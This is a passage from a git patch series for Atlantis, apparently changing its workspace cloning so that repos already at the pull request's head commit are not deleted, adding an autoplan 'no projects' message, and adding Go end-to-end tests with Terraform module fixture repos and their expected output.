server/testfixtures/test-repos/simple/exp-output-atlantis-plan-var-default-workspace.txt diff --git a/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt b/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt new file mode 100644 index 0000000000..1b856aa5c4 --- /dev/null +++ b/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt @@ -0,0 +1,3 @@ +Locks and plans deleted for the projects and workspaces modified in this pull request: + +- path: `runatlantis/atlantis-tests/.` workspaces: `default`, `new_workspace` diff --git a/server/testfixtures/test-repos/simple/main.tf b/server/testfixtures/test-repos/simple/main.tf index 028fbb2139..588b3db4df 100644 --- a/server/testfixtures/test-repos/simple/main.tf +++ b/server/testfixtures/test-repos/simple/main.tf @@ -6,6 +6,10 @@ variable "var" { default = "default" } -output "this" { +output "var" { value = "${var.var}" +} + +output "workspace" { + value = "${terraform.workspace}" } \ No newline at end of file From e7d5bf54fbb0c565f2f9956d4e39e3e9dcb0490b Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Mon, 18 Jun 2018 20:54:58 +0100 Subject: [PATCH 28/69] Implement not deleting repo when same sha --- server/events/atlantis_workspace.go | 31 ++- server/events/command_handler.go | 2 +- server/events/markdown_renderer.go | 8 +- server/events_controller_e2e_test.go | 178 ++++++++++++------ .../test-repos/modules-yaml/atlantis.yaml | 8 + .../exp-output-apply-production.txt | 13 ++ .../modules-yaml/exp-output-apply-staging.txt | 13 ++ .../modules-yaml/exp-output-autoplan.txt | 51 +++++ .../exp-output-merge-all-dirs.txt | 4 + .../exp-output-merge-only-staging.txt | 3 + .../modules-yaml/exp-output-merge.txt | 4 + .../exp-output-plan-production.txt | 23 +++ .../modules-yaml/exp-output-plan-staging.txt | 23 +++ .../modules-yaml/modules/null/main.tf | 10 + .../modules-yaml/production/main.tf | 7 + .../test-repos/modules-yaml/staging/main.tf | 7 + .../modules/exp-output-apply-production.txt | 13 ++ .../modules/exp-output-apply-staging.txt | 13 ++ .../exp-output-autoplan-only-modules.txt | 2 + .../exp-output-autoplan-only-staging.txt | 23 +++ .../modules/exp-output-merge-all-dirs.txt | 4 + .../modules/exp-output-merge-only-staging.txt | 3 + .../test-repos/modules/exp-output-merge.txt | 4 + .../modules/exp-output-plan-production.txt | 23 +++ .../modules/exp-output-plan-staging.txt | 23 +++ .../test-repos/modules/modules/null/main.tf | 10 + .../test-repos/modules/production/main.tf | 7 + .../test-repos/modules/staging/main.tf | 7 + .../simple/exp-output-merge-workspaces.txt | 2 +- 29 files changed, 448 insertions(+), 71 deletions(-) create mode 100644 server/testfixtures/test-repos/modules-yaml/atlantis.yaml create mode 100644 server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt create mode 100644 server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt create mode 100644 server/testfixtures/test-repos/modules-yaml/exp-output-autoplan.txt create mode 100644 server/testfixtures/test-repos/modules-yaml/exp-output-merge-all-dirs.txt create mode 100644 server/testfixtures/test-repos/modules-yaml/exp-output-merge-only-staging.txt create mode 100644 server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt create mode 100644 server/testfixtures/test-repos/modules-yaml/exp-output-plan-production.txt create mode 100644 server/testfixtures/test-repos/modules-yaml/exp-output-plan-staging.txt create mode 100644 server/testfixtures/test-repos/modules-yaml/modules/null/main.tf create mode 100644 server/testfixtures/test-repos/modules-yaml/production/main.tf create mode 100644 server/testfixtures/test-repos/modules-yaml/staging/main.tf create mode 100644 server/testfixtures/test-repos/modules/exp-output-apply-production.txt create mode 100644 server/testfixtures/test-repos/modules/exp-output-apply-staging.txt create mode 100644 server/testfixtures/test-repos/modules/exp-output-autoplan-only-modules.txt create mode 100644 server/testfixtures/test-repos/modules/exp-output-autoplan-only-staging.txt create mode 100644 server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt create mode 100644 server/testfixtures/test-repos/modules/exp-output-merge-only-staging.txt create mode 100644 server/testfixtures/test-repos/modules/exp-output-merge.txt create mode 100644 server/testfixtures/test-repos/modules/exp-output-plan-production.txt create mode 100644 server/testfixtures/test-repos/modules/exp-output-plan-staging.txt create mode 100644 server/testfixtures/test-repos/modules/modules/null/main.tf create mode 100644 server/testfixtures/test-repos/modules/production/main.tf create mode 100644 server/testfixtures/test-repos/modules/staging/main.tf diff --git a/server/events/atlantis_workspace.go b/server/events/atlantis_workspace.go index 190b87790d..67112b1ce4 100644 --- a/server/events/atlantis_workspace.go +++ b/server/events/atlantis_workspace.go @@ -18,6 +18,7 @@ import ( "os/exec" "path/filepath" "strconv" + "strings" "github.com/pkg/errors" "github.com/runatlantis/atlantis/server/events/models" @@ -48,7 +49,9 @@ type FileWorkspace struct { } // Clone git clones headRepo, checks out the branch and then returns the absolute -// path to the root of the cloned repo. +// path to the root of the cloned repo. If the repo already exists and is at +// the right commit it does nothing. This is to support running commands in +// multiple dirs of the same repo without deleting existing plans. func (w *FileWorkspace) Clone( log *logging.SimpleLogger, baseRepo models.Repo, @@ -57,11 +60,27 @@ func (w *FileWorkspace) Clone( workspace string) (string, error) { cloneDir := w.cloneDir(baseRepo, p, workspace) - // This is safe to do because we lock runs on repo/pull/workspace so no one else - // is using this workspace. - log.Info("cleaning clone directory %q", cloneDir) - if err := os.RemoveAll(cloneDir); err != nil { - return "", errors.Wrap(err, "deleting old workspace") + // If the directory already exists, check if it's at the right commit. + // If so, then we do nothing. + if _, err := os.Stat(cloneDir); err == nil { + revParseCmd := exec.Command("git", "rev-parse", "HEAD") // #nosec + revParseCmd.Dir = cloneDir + output, err := revParseCmd.CombinedOutput() + if err != nil { + return "", errors.Wrapf(err, "running git rev-parse HEAD: %s", string(output)) + } + currCommit := strings.Trim(string(output), "\n") + if string(currCommit) == p.HeadCommit { + log.Debug("repo is at correct commit %q so will not re-clone", p.HeadCommit) + return cloneDir, nil + } + log.Debug("repo was already cloned but is not at correct commit, wanted %q got %q", p.HeadCommit, string(currCommit)) + + // It's okay to delete all plans now since they're out of date. + log.Info("cleaning clone directory %q", cloneDir) + if err := os.RemoveAll(cloneDir); err != nil { + return "", errors.Wrap(err, "deleting old workspace") + } } // Create the directory and parents if necessary. diff --git a/server/events/command_handler.go b/server/events/command_handler.go index 601d3be099..bfd25dd935 100644 --- a/server/events/command_handler.go +++ b/server/events/command_handler.go @@ -195,7 +195,7 @@ func (c *CommandHandler) updatePull(ctx *CommandContext, res CommandResponse) { if err := c.CommitStatusUpdater.UpdateProjectResult(ctx, res); err != nil { ctx.Log.Warn("unable to update commit status: %s", err) } - comment := c.MarkdownRenderer.Render(res, ctx.Command.Name, ctx.Log.History.String(), ctx.Command.Verbose) + comment := c.MarkdownRenderer.Render(res, ctx.Command.Name, ctx.Log.History.String(), ctx.Command.Verbose, ctx.Command.Autoplan) c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, comment) // nolint: errcheck } diff --git a/server/events/markdown_renderer.go b/server/events/markdown_renderer.go index 4094c3861c..0f623f04a6 100644 --- a/server/events/markdown_renderer.go +++ b/server/events/markdown_renderer.go @@ -58,7 +58,7 @@ type ProjectResultTmplData struct { // Render formats the data into a markdown string. // nolint: interfacer -func (m *MarkdownRenderer) Render(res CommandResponse, cmdName CommandName, log string, verbose bool) string { +func (m *MarkdownRenderer) Render(res CommandResponse, cmdName CommandName, log string, verbose bool, autoplan bool) string { commandStr := strings.Title(cmdName.String()) common := CommonData{commandStr, verbose, log} if res.Error != nil { @@ -67,6 +67,9 @@ func (m *MarkdownRenderer) Render(res CommandResponse, cmdName CommandName, log if res.Failure != "" { return m.renderTemplate(failureWithLogTmpl, FailureData{res.Failure, common}) } + if len(res.ProjectResults) == 0 && autoplan { + return m.renderTemplate(autoplanNoProjectsWithLogTmpl, common) + } return m.renderProjectResults(res.ProjectResults, common) } @@ -145,9 +148,12 @@ var errTmplText = "**{{.Command}} Error**\n" + "```\n" + "{{.Error}}\n" + "```\n" +var autoplanNoProjectsTmplText = "Ran `plan` in 0 projects because Atlantis detected no Terraform changes or could not determine where to run `plan`.\n" var errTmpl = template.Must(template.New("").Parse(errTmplText)) var errWithLogTmpl = template.Must(template.New("").Parse(errTmplText + logTmpl)) var failureTmplText = "**{{.Command}} Failed**: {{.Failure}}\n" var failureTmpl = template.Must(template.New("").Parse(failureTmplText)) var failureWithLogTmpl = template.Must(template.New("").Parse(failureTmplText + logTmpl)) +var autoplanNoProjectsTmpl = template.Must(template.New("").Parse(autoplanNoProjectsTmplText)) +var autoplanNoProjectsWithLogTmpl = template.Must(template.New("").Parse(autoplanNoProjectsTmplText + logTmpl)) var logTmpl = "{{if .Verbose}}\n
Log\n

\n\n```\n{{.Log}}```\n

{{end}}\n" diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go index e2bb30ff6e..2cd7183c07 100644 --- a/server/events_controller_e2e_test.go +++ b/server/events_controller_e2e_test.go @@ -6,6 +6,7 @@ import ( "io/ioutil" "net/http" "net/http/httptest" + "os" "os/exec" "path/filepath" "regexp" @@ -58,40 +59,40 @@ func TestGitHubWorkflow(t *testing.T) { ExpMergeCommentFile string CommentAndReplies []string }{ - //{ - // Description: "simple", - // RepoDir: "simple", - // ModifiedFiles: []string{"main.tf"}, - // ExpAutoplanCommentFile: "exp-output-autoplan.txt", - // CommentAndReplies: []string{ - // "atlantis apply", "exp-output-apply.txt", - // }, - // ExpMergeCommentFile: "exp-output-merge.txt", - //}, - //{ - // Description: "simple with comment -var", - // RepoDir: "simple", - // ModifiedFiles: []string{"main.tf"}, - // ExpAutoplanCommentFile: "exp-output-autoplan.txt", - // CommentAndReplies: []string{ - // "atlantis plan -- -var var=overridden", "exp-output-atlantis-plan.txt", - // "atlantis apply", "exp-output-apply-var.txt", - // }, - // ExpMergeCommentFile: "exp-output-merge.txt", - //}, - //{ - // Description: "simple with workspaces", - // RepoDir: "simple", - // ModifiedFiles: []string{"main.tf"}, - // ExpAutoplanCommentFile: "exp-output-autoplan.txt", - // CommentAndReplies: []string{ - // "atlantis plan -- -var var=default_workspace", "exp-output-atlantis-plan.txt", - // "atlantis plan -w new_workspace -- -var var=new_workspace", "exp-output-atlantis-plan-new-workspace.txt", - // "atlantis apply", "exp-output-apply-var-default-workspace.txt", - // "atlantis apply -w new_workspace", "exp-output-apply-var-new-workspace.txt", - // }, - // ExpMergeCommentFile: "exp-output-merge-workspaces.txt", - //}, + { + Description: "simple", + RepoDir: "simple", + ModifiedFiles: []string{"main.tf"}, + ExpAutoplanCommentFile: "exp-output-autoplan.txt", + CommentAndReplies: []string{ + "atlantis apply", "exp-output-apply.txt", + }, + ExpMergeCommentFile: "exp-output-merge.txt", + }, + { + Description: "simple with comment -var", + RepoDir: "simple", + ModifiedFiles: []string{"main.tf"}, + ExpAutoplanCommentFile: "exp-output-autoplan.txt", + CommentAndReplies: []string{ + "atlantis plan -- -var var=overridden", "exp-output-atlantis-plan.txt", + "atlantis apply", "exp-output-apply-var.txt", + }, + ExpMergeCommentFile: "exp-output-merge.txt", + }, + { + Description: "simple with workspaces", + RepoDir: "simple", + ModifiedFiles: []string{"main.tf"}, + ExpAutoplanCommentFile: "exp-output-autoplan.txt", + CommentAndReplies: []string{ + "atlantis plan -- -var var=default_workspace", "exp-output-atlantis-plan.txt", + "atlantis plan -w new_workspace -- -var var=new_workspace", "exp-output-atlantis-plan-new-workspace.txt", + "atlantis apply", "exp-output-apply-var-default-workspace.txt", + "atlantis apply -w new_workspace", "exp-output-apply-var-new-workspace.txt", + }, + ExpMergeCommentFile: "exp-output-merge-workspaces.txt", + }, { Description: "simple with atlantis.yaml", RepoDir: "simple-yaml", @@ -103,18 +104,52 @@ func TestGitHubWorkflow(t *testing.T) { }, ExpMergeCommentFile: "exp-output-merge.txt", }, + { + Description: "modules staging only", + RepoDir: "modules", + ModifiedFiles: []string{"staging/main.tf"}, + ExpAutoplanCommentFile: "exp-output-autoplan-only-staging.txt", + CommentAndReplies: []string{ + "atlantis apply -d staging", "exp-output-apply-staging.txt", + }, + ExpMergeCommentFile: "exp-output-merge-only-staging.txt", + }, + { + Description: "modules modules only", + RepoDir: "modules", + ModifiedFiles: []string{"modules/null/main.tf"}, + ExpAutoplanCommentFile: "exp-output-autoplan-only-modules.txt", + CommentAndReplies: []string{ + "atlantis plan -d staging", "exp-output-plan-staging.txt", + "atlantis plan -d production", "exp-output-plan-production.txt", + "atlantis apply -d staging", "exp-output-apply-staging.txt", + "atlantis apply -d production", "exp-output-apply-production.txt", + }, + ExpMergeCommentFile: "exp-output-merge-all-dirs.txt", + }, + { + Description: "modules-yaml", + RepoDir: "modules-yaml", + ModifiedFiles: []string{"modules/null/main.tf"}, + ExpAutoplanCommentFile: "exp-output-autoplan.txt", + CommentAndReplies: []string{ + "atlantis apply -d staging", "exp-output-apply-staging.txt", + "atlantis apply -d production", "exp-output-apply-production.txt", + }, + ExpMergeCommentFile: "exp-output-merge-all-dirs.txt", + }, } for _, c := range cases { t.Run(c.Description, func(t *testing.T) { ctrl, vcsClient, githubGetter, atlantisWorkspace := setupE2E(t) // Set the repo to be cloned through the testing backdoor. - repoDir, cleanup := initializeRepo(t, c.RepoDir) + repoDir, headSHA, cleanup := initializeRepo(t, c.RepoDir) defer cleanup() atlantisWorkspace.TestingOverrideCloneURL = fmt.Sprintf("file://%s", repoDir) // Setup test dependencies. w := httptest.NewRecorder() - When(githubGetter.GetPullRequest(AnyRepo(), AnyInt())).ThenReturn(GitHubPullRequestParsed(), nil) + When(githubGetter.GetPullRequest(AnyRepo(), AnyInt())).ThenReturn(GitHubPullRequestParsed(headSHA), nil) When(vcsClient.GetModifiedFiles(AnyRepo(), matchers.AnyModelsPullRequest())).ThenReturn(c.ModifiedFiles, nil) // First, send the open pull request event and trigger an autoplan. @@ -122,9 +157,7 @@ func TestGitHubWorkflow(t *testing.T) { ctrl.Post(w, pullOpenedReq) responseContains(t, w, 200, "Processing...") _, _, autoplanComment := vcsClient.VerifyWasCalledOnce().CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() - exp, err := ioutil.ReadFile(filepath.Join(repoDir, c.ExpAutoplanCommentFile)) - Ok(t, err) - Equals(t, string(exp), autoplanComment) + assertCommentEquals(t, c.ExpAutoplanCommentFile, autoplanComment, c.RepoDir) // Now send any other comments. for i := 0; i < len(c.CommentAndReplies); i += 2 { @@ -136,16 +169,7 @@ func TestGitHubWorkflow(t *testing.T) { ctrl.Post(w, commentReq) responseContains(t, w, 200, "Processing...") _, _, atlantisComment := vcsClient.VerifyWasCalled(Times((i/2)+2)).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() - - exp, err = ioutil.ReadFile(filepath.Join(repoDir, expOutputFile)) - Ok(t, err) - // Replace all 'ID: 1111818181' strings with * so we can do a comparison. - idRegex := regexp.MustCompile(`\(ID: [0-9]+\)`) - atlantisComment = idRegex.ReplaceAllString(atlantisComment, "(ID: ******************)") - if string(exp) != atlantisComment { - t.Logf("comment: %s", comment) - } - Equals(t, string(exp), atlantisComment) + assertCommentEquals(t, expOutputFile, atlantisComment, c.RepoDir) } // Finally, send the pull request merged event. @@ -155,9 +179,7 @@ func TestGitHubWorkflow(t *testing.T) { responseContains(t, w, 200, "Pull request cleaned successfully") numPrevComments := (len(c.CommentAndReplies) / 2) + 1 _, _, pullClosedComment := vcsClient.VerifyWasCalled(Times(numPrevComments+1)).CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() - exp, err = ioutil.ReadFile(filepath.Join(repoDir, c.ExpMergeCommentFile)) - Ok(t, err) - Equals(t, string(exp), pullClosedComment) + assertCommentEquals(t, c.ExpMergeCommentFile, pullClosedComment, c.RepoDir) }) } } @@ -166,8 +188,6 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy, allowForkPRs := false dataDir, cleanup := TempDir(t) defer cleanup() - testRepoDir, err := filepath.Abs("testfixtures/test-repos/simple") - Ok(t, err) // Mocks. e2eVCSClient := vcsmocks.NewMockClientProxy() @@ -199,7 +219,7 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy, } atlantisWorkspace := &events.FileWorkspace{ DataDir: dataDir, - TestingOverrideCloneURL: testRepoDir, + TestingOverrideCloneURL: "override-me", } defaultTFVersion := terraformClient.Version() @@ -318,7 +338,11 @@ func GitHubPullRequestClosedEvent(t *testing.T) *http.Request { return req } -func GitHubPullRequestParsed() *github.PullRequest { +func GitHubPullRequestParsed(headSHA string) *github.PullRequest { + // headSHA can't be empty so default if not set. + if headSHA == "" { + headSHA = "13940d121be73f656e2132c6d7b4c8e87878ac8d" + } return &github.PullRequest{ Number: github.Int(1), State: github.String("open"), @@ -328,7 +352,7 @@ func GitHubPullRequestParsed() *github.PullRequest { FullName: github.String("runatlantis/atlantis-tests"), CloneURL: github.String("/runatlantis/atlantis-tests.git"), }, - SHA: github.String("sha"), + SHA: github.String(headSHA), Ref: github.String("branch"), }, Base: &github.PullRequestBranch{ @@ -343,15 +367,21 @@ func GitHubPullRequestParsed() *github.PullRequest { } } +// absRepoPath returns the absolute path to the test repo under dir repoDir. +func absRepoPath(t *testing.T, repoDir string) string { + path, err := filepath.Abs(filepath.Join("testfixtures", "test-repos", repoDir)) + Ok(t, err) + return path +} + // initializeRepo copies the repo data from testfixtures and initializes a new // git repo in a temp directory. It returns that directory and a function // to run in a defer that will delete the dir. // The purpose of this function is to create a real git repository with a branch // called 'branch' from the files under repoDir. This is so we can check in // those files normally without needing a .git directory. -func initializeRepo(t *testing.T, repoDir string) (string, func()) { - originRepo, err := filepath.Abs(filepath.Join("testfixtures", "test-repos", repoDir)) - Ok(t, err) +func initializeRepo(t *testing.T, repoDir string) (string, string, func()) { + originRepo := absRepoPath(t, repoDir) // Copy the files to the temp dir. destDir, cleanup := TempDir(t) @@ -365,13 +395,37 @@ func initializeRepo(t *testing.T, repoDir string) (string, func()) { runCmd(t, destDir, "git", "checkout", "-b", "branch") runCmd(t, destDir, "git", "add", ".") runCmd(t, destDir, "git", "commit", "-am", "branch commit") + headSHA := runCmd(t, destDir, "git", "rev-parse", "HEAD") + headSHA = strings.Trim(headSHA, "\n") - return destDir, cleanup + return destDir, headSHA, cleanup } -func runCmd(t *testing.T, dir string, name string, args ...string) { +func runCmd(t *testing.T, dir string, name string, args ...string) string { cpCmd := exec.Command(name, args...) cpCmd.Dir = dir cpOut, err := cpCmd.CombinedOutput() Assert(t, err == nil, "err running %q: %s", strings.Join(append([]string{name}, args...), " "), cpOut) + return string(cpOut) +} + +func assertCommentEquals(t *testing.T, expFile string, act string, repoDir string) { + t.Helper() + exp, err := ioutil.ReadFile(filepath.Join(absRepoPath(t, repoDir), expFile)) + Ok(t, err) + + // Replace all 'ID: 1111818181' strings with * so we can do a comparison. + idRegex := regexp.MustCompile(`\(ID: [0-9]+\)`) + act = idRegex.ReplaceAllString(act, "(ID: ******************)") + + if string(exp) != act { + actFile := filepath.Join(absRepoPath(t, repoDir), expFile+".act") + err := ioutil.WriteFile(actFile, []byte(act), 0600) + Ok(t, err) + cwd, err := os.Getwd() + Ok(t, err) + rel, err := filepath.Rel(cwd, actFile) + Ok(t, err) + t.Errorf("%q was different, wrote actual comment to %q", expFile, rel) + } } diff --git a/server/testfixtures/test-repos/modules-yaml/atlantis.yaml b/server/testfixtures/test-repos/modules-yaml/atlantis.yaml new file mode 100644 index 0000000000..e5915f3911 --- /dev/null +++ b/server/testfixtures/test-repos/modules-yaml/atlantis.yaml @@ -0,0 +1,8 @@ +version: 2 +projects: +- dir: staging + autoplan: + when_modified: ["**/*.tf", "../modules/null/*"] +- dir: production + autoplan: + when_modified: ["**/*.tf", "../modules/null/*"] diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt new file mode 100644 index 0000000000..81c3ec8bfa --- /dev/null +++ b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt @@ -0,0 +1,13 @@ +Ran Apply in dir: `production` workspace: `default` +```diff +module.null.null_resource.this: Creating... +module.null.null_resource.this: Creation complete after 0s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. + +Outputs: + +var = production + +``` + diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt new file mode 100644 index 0000000000..2ec35e2786 --- /dev/null +++ b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt @@ -0,0 +1,13 @@ +Ran Apply in dir: `staging` workspace: `default` +```diff +module.null.null_resource.this: Creating... +module.null.null_resource.this: Creation complete after 0s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. + +Outputs: + +var = staging + +``` + diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-autoplan.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-autoplan.txt new file mode 100644 index 0000000000..f9a2c26ebc --- /dev/null +++ b/server/testfixtures/test-repos/modules-yaml/exp-output-autoplan.txt @@ -0,0 +1,51 @@ +Ran Plan for 2 projects: +1. workspace: `default` path: `staging` +1. workspace: `default` path: `production` + +### 1. workspace: `default` path: `staging` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ module.null.null_resource.this + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). +--- +### 2. workspace: `default` path: `production` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ module.null.null_resource.this + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). +--- + diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-merge-all-dirs.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-merge-all-dirs.txt new file mode 100644 index 0000000000..9712df1ee2 --- /dev/null +++ b/server/testfixtures/test-repos/modules-yaml/exp-output-merge-all-dirs.txt @@ -0,0 +1,4 @@ +Locks and plans deleted for the projects and workspaces modified in this pull request: + +- path: `runatlantis/atlantis-tests/production` workspace: `default` +- path: `runatlantis/atlantis-tests/staging` workspace: `default` \ No newline at end of file diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-merge-only-staging.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-merge-only-staging.txt new file mode 100644 index 0000000000..49c8312cd7 --- /dev/null +++ b/server/testfixtures/test-repos/modules-yaml/exp-output-merge-only-staging.txt @@ -0,0 +1,3 @@ +Locks and plans deleted for the projects and workspaces modified in this pull request: + +- path: `runatlantis/atlantis-tests/staging` workspace: `default` \ No newline at end of file diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt new file mode 100644 index 0000000000..b64103b412 --- /dev/null +++ b/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt @@ -0,0 +1,4 @@ +Locks and plans deleted for the projects and workspaces modified in this pull request: + +- path: `runatlantis/atlantis-tests/staging` workspace: `default` +- path: `runatlantis/atlantis-tests/.` workspace: `default` diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-plan-production.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-plan-production.txt new file mode 100644 index 0000000000..caea5e6434 --- /dev/null +++ b/server/testfixtures/test-repos/modules-yaml/exp-output-plan-production.txt @@ -0,0 +1,23 @@ +Ran Plan in dir: `production` workspace: `default` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ module.null.null_resource.this + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). + diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-plan-staging.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-plan-staging.txt new file mode 100644 index 0000000000..0e77a94421 --- /dev/null +++ b/server/testfixtures/test-repos/modules-yaml/exp-output-plan-staging.txt @@ -0,0 +1,23 @@ +Ran Plan in dir: `staging` workspace: `default` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ module.null.null_resource.this + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). + diff --git a/server/testfixtures/test-repos/modules-yaml/modules/null/main.tf b/server/testfixtures/test-repos/modules-yaml/modules/null/main.tf new file mode 100644 index 0000000000..14f6a189c1 --- /dev/null +++ b/server/testfixtures/test-repos/modules-yaml/modules/null/main.tf @@ -0,0 +1,10 @@ +variable "var" {} +resource "null_resource" "this" { +} +output "var" { + value = "${var.var}" +} + +output "workspace" { + value = "${terraform.workspace}" +} diff --git a/server/testfixtures/test-repos/modules-yaml/production/main.tf b/server/testfixtures/test-repos/modules-yaml/production/main.tf new file mode 100644 index 0000000000..94a103ffba --- /dev/null +++ b/server/testfixtures/test-repos/modules-yaml/production/main.tf @@ -0,0 +1,7 @@ +module "null" { + source = "../modules/null" + var = "production" +} +output "var" { + value = "${module.null.var}" +} \ No newline at end of file diff --git a/server/testfixtures/test-repos/modules-yaml/staging/main.tf b/server/testfixtures/test-repos/modules-yaml/staging/main.tf new file mode 100644 index 0000000000..15fa81303a --- /dev/null +++ b/server/testfixtures/test-repos/modules-yaml/staging/main.tf @@ -0,0 +1,7 @@ +module "null" { + source = "../modules/null" + var = "staging" +} +output "var" { + value = "${module.null.var}" +} \ No newline at end of file diff --git a/server/testfixtures/test-repos/modules/exp-output-apply-production.txt b/server/testfixtures/test-repos/modules/exp-output-apply-production.txt new file mode 100644 index 0000000000..81c3ec8bfa --- /dev/null +++ b/server/testfixtures/test-repos/modules/exp-output-apply-production.txt @@ -0,0 +1,13 @@ +Ran Apply in dir: `production` workspace: `default` +```diff +module.null.null_resource.this: Creating... +module.null.null_resource.this: Creation complete after 0s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. + +Outputs: + +var = production + +``` + diff --git a/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt b/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt new file mode 100644 index 0000000000..2ec35e2786 --- /dev/null +++ b/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt @@ -0,0 +1,13 @@ +Ran Apply in dir: `staging` workspace: `default` +```diff +module.null.null_resource.this: Creating... +module.null.null_resource.this: Creation complete after 0s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. + +Outputs: + +var = staging + +``` + diff --git a/server/testfixtures/test-repos/modules/exp-output-autoplan-only-modules.txt b/server/testfixtures/test-repos/modules/exp-output-autoplan-only-modules.txt new file mode 100644 index 0000000000..63b09ca64f --- /dev/null +++ b/server/testfixtures/test-repos/modules/exp-output-autoplan-only-modules.txt @@ -0,0 +1,2 @@ +Ran `plan` in 0 projects because Atlantis detected no Terraform changes or could not determine where to run `plan`. + diff --git a/server/testfixtures/test-repos/modules/exp-output-autoplan-only-staging.txt b/server/testfixtures/test-repos/modules/exp-output-autoplan-only-staging.txt new file mode 100644 index 0000000000..0e77a94421 --- /dev/null +++ b/server/testfixtures/test-repos/modules/exp-output-autoplan-only-staging.txt @@ -0,0 +1,23 @@ +Ran Plan in dir: `staging` workspace: `default` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ module.null.null_resource.this + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). + diff --git a/server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt b/server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt new file mode 100644 index 0000000000..9712df1ee2 --- /dev/null +++ b/server/testfixtures/test-repos/modules/exp-output-merge-all-dirs.txt @@ -0,0 +1,4 @@ +Locks and plans deleted for the projects and workspaces modified in this pull request: + +- path: `runatlantis/atlantis-tests/production` workspace: `default` +- path: `runatlantis/atlantis-tests/staging` workspace: `default` \ No newline at end of file diff --git a/server/testfixtures/test-repos/modules/exp-output-merge-only-staging.txt b/server/testfixtures/test-repos/modules/exp-output-merge-only-staging.txt new file mode 100644 index 0000000000..49c8312cd7 --- /dev/null +++ b/server/testfixtures/test-repos/modules/exp-output-merge-only-staging.txt @@ -0,0 +1,3 @@ +Locks and plans deleted for the projects and workspaces modified in this pull request: + +- path: `runatlantis/atlantis-tests/staging` workspace: `default` \ No newline at end of file diff --git a/server/testfixtures/test-repos/modules/exp-output-merge.txt b/server/testfixtures/test-repos/modules/exp-output-merge.txt new file mode 100644 index 0000000000..b64103b412 --- /dev/null +++ b/server/testfixtures/test-repos/modules/exp-output-merge.txt @@ -0,0 +1,4 @@ +Locks and plans deleted for the projects and workspaces modified in this pull request: + +- path: `runatlantis/atlantis-tests/staging` workspace: `default` +- path: `runatlantis/atlantis-tests/.` workspace: `default` diff --git a/server/testfixtures/test-repos/modules/exp-output-plan-production.txt 